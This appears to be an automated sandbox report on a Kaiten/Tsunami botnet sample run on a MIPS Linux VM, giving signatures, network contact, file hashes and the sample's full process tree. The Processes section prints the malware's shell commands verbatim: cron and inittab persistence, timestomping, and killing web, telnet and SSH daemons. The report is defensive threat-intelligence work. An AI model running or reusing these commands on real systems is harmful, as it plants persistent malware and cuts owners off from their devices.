Malware Analysis Report

2024-11-13 15:54

Sample ID 241027-r46c9aydjc
Target 749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c
SHA256 749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c
Tags: kaiten, botnet, defense_evasion, discovery, execution, persistence, privilege_escalation
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c

Threat Level: Known bad

The file 749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c was found to be: Known bad.

Malicious Activity Summary

Tags: kaiten, botnet, defense_evasion, discovery, execution, persistence, privilege_escalation

Detects Kaiten/Tsunami Payload

Kaiten family

Kaiten/Tsunami

Creates/modifies Cron job

Enumerates running processes

Indicator Removal: Timestomp

Enumerates kernel/hardware configuration

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 14:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 14:45

Reported

2024-10-27 14:48

Platform

debian9-mipsel-20240611-en

Max time kernel

8s

Max time network

5s

Command Line

[/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c]

Signatures

Detects Kaiten/Tsunami Payload


Kaiten family

kaiten

Kaiten/Tsunami

botnet kaiten

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.dfqTdg /usr/bin/crontab N/A

Enumerates running processes

Indicator Removal: Timestomp

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/touch N/A
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/touch N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A (9 identical events)

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/230/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/772/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/167/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/754/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/692/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/372/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/699/stat /usr/bin/killall N/A
File opened for reading /proc/345/stat /usr/bin/killall N/A
File opened for reading /proc/372/stat /usr/bin/killall N/A
File opened for reading /proc/745/stat /usr/bin/killall N/A
File opened for reading /proc/754/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/345/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/660/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/150/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/138/cmdline /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/790/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/115/cmdline /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/698/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/67/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/68/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/421/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/421/stat /usr/bin/killall N/A
File opened for reading /proc/769/stat /usr/bin/killall N/A
File opened for reading /proc/68/stat /usr/bin/killall N/A
File opened for reading /proc/754/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/777/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/138/cmdline /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/138/cmdline /usr/bin/killall N/A

Processes

/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c

[/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c]

/bin/sh

[sh -c touch -acmr /bin/ls /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c]

/bin/sh

[sh -c (crontab -l | grep -v "/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c" | grep -v "no cron" | grep -v "lesshts/run.sh" > /var/run/.x00740882966) > /dev/null 2>&1]

/bin/grep

[grep -v /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c]

/bin/grep

[grep -v no cron]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep -v lesshts/run.sh]

/bin/sh

[sh -c echo "* * * * * /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c > /dev/null 2>&1 &" >> /var/run/.x00740882966]

/bin/sh

[sh -c crontab /var/run/.x00740882966]

/usr/bin/crontab

[crontab /var/run/.x00740882966]

/bin/sh

[sh -c rm -rf /var/run/.x00740882966]

/bin/rm

[rm -rf /var/run/.x00740882966]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c" > /etc/inittab2]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c]

/bin/sh

[sh -c echo "0:2345:respawn:/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c" >> /etc/inittab2]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c /bin/uname -n]

/bin/uname

[/bin/uname -n]

/bin/sh

[sh -c /bin/uname -n]

/bin/uname

[/bin/uname -n]

/bin/sh

[sh -c /bin/uname -n]

/bin/uname

[/bin/uname -n]

/bin/sh

[sh -c kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &]

/bin/sh

[sh -c service httpd stop > /dev/null 2>&1 &]

/bin/cat

[cat /var/run/httpd.pid]

/bin/sh

[sh -c killall -9 mini_httpd > /dev/null 2>&1 &]

/usr/sbin/service

[service httpd stop]

/bin/sh

[sh -c killall -9 minihttpd > /dev/null 2>&1 &]

/usr/bin/killall

[killall -9 mini_httpd]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &]

/usr/bin/killall

[killall -9 minihttpd]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c nvram set httpd_enable=0 > /dev/null 2>&1]

/bin/cat

[cat /var/run/thttpd.pid]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sh

[sh -c nvram set http_enable=0 > /dev/null 2>&1]

/bin/sh

[sh -c killall -9 httpd > /dev/null 2>&1 &]

/bin/sh

[sh -c service telnetd stop > /dev/null 2>&1 &]

/usr/bin/killall

[killall -9 httpd]

/bin/sh

[sh -c service sshd stop > /dev/null 2>&1 &]

/usr/sbin/service

[service telnetd stop]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/sh

[sh -c killall -9 telnetd > /dev/null 2>&1 &]

/usr/sbin/service

[service sshd stop]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c killall -9 utelnetd > /dev/null 2>&1 &]

/usr/bin/killall

[killall -9 telnetd]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c killall -9 dropbear > /dev/null 2>&1 &]

/usr/bin/killall

[killall -9 utelnetd]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/usr/local/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop httpd.service]

/usr/local/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop httpd.service]

/usr/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop httpd.service]

/usr/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop httpd.service]

/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop httpd.service]

/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop httpd.service]

/bin/sh

[sh -c killall -9 sshd > /dev/null 2>&1 &]

/usr/bin/killall

[killall -9 dropbear]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sh

[sh -c killall -9 lighttpd > /dev/null 2>&1 &]

/usr/bin/killall

[killall -9 sshd]

/usr/bin/killall

[killall -9 lighttpd]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/usr/local/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop telnetd.service]

/usr/local/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop telnetd.service]

/usr/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop telnetd.service]

/usr/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop telnetd.service]

/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop telnetd.service]

/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop telnetd.service]

/usr/local/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop sshd.service]

/usr/local/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop sshd.service]

/usr/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop sshd.service]

/usr/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop sshd.service]

/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop sshd.service]

/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop sshd.service]

Network

Country Destination Domain Proto
RU 195.133.232.91:8080 N/A tcp

Files

memory/700-1-0x00400000-0x005777e8-memory.dmp

/run/.x00740882966

MD5 902500eb591448fdf0429190ca97b1b8
SHA1 abcab7548580c6edda59d47e7defc8f57c77bfc9
SHA256 f998d3658ddd489491adf1d1e4258a8e517fe0daf59c97d20ed289bb5694ee2e
SHA512 c6821fbaf2bc0cc1eec1dd46753c78aa410ec4b89be7d5001b6a9b904933e24dc84a3969615d981dfb15bd0cab38b2fd639dea2bea4264343a9bb551ad24b7c4

/var/spool/cron/crontabs/tmp.dfqTdg

MD5 afa442e0c7e7a7f4b351c19901209c21
SHA1 08be14f5db36070b7caad4b5d0b36578e6a07fbd
SHA256 9417bcd3aa8d95abeebbec85d036d5e3930d6d04e0067d0fc41a038f9203dc5f
SHA512 d319c83a08e4018d6637955a4c0e5565e84c13f7f8aff26620170e7938e7331a787bc23606c6f4031d13e53c6f0403fa74e19299e9984d704d344f1e5fc4017c

/etc/inittab2

MD5 b6789402fc08db781649a3fce1776ece
SHA1 df66ddabc65d910bb1617dfffcea6e01c651e478
SHA256 2dd5ebb0768ec6da19582bd64eebcd975d94125542d01a38c75f97b581dd4eaf
SHA512 799b8b08b044571f7659a3044bb3c09073bee717db6dd934f8fbfdf1e79f3babb0b8b0f22d6377e2ba8281eb3dcddc4ba705b8483c88388dc1d5f44fc78dd68d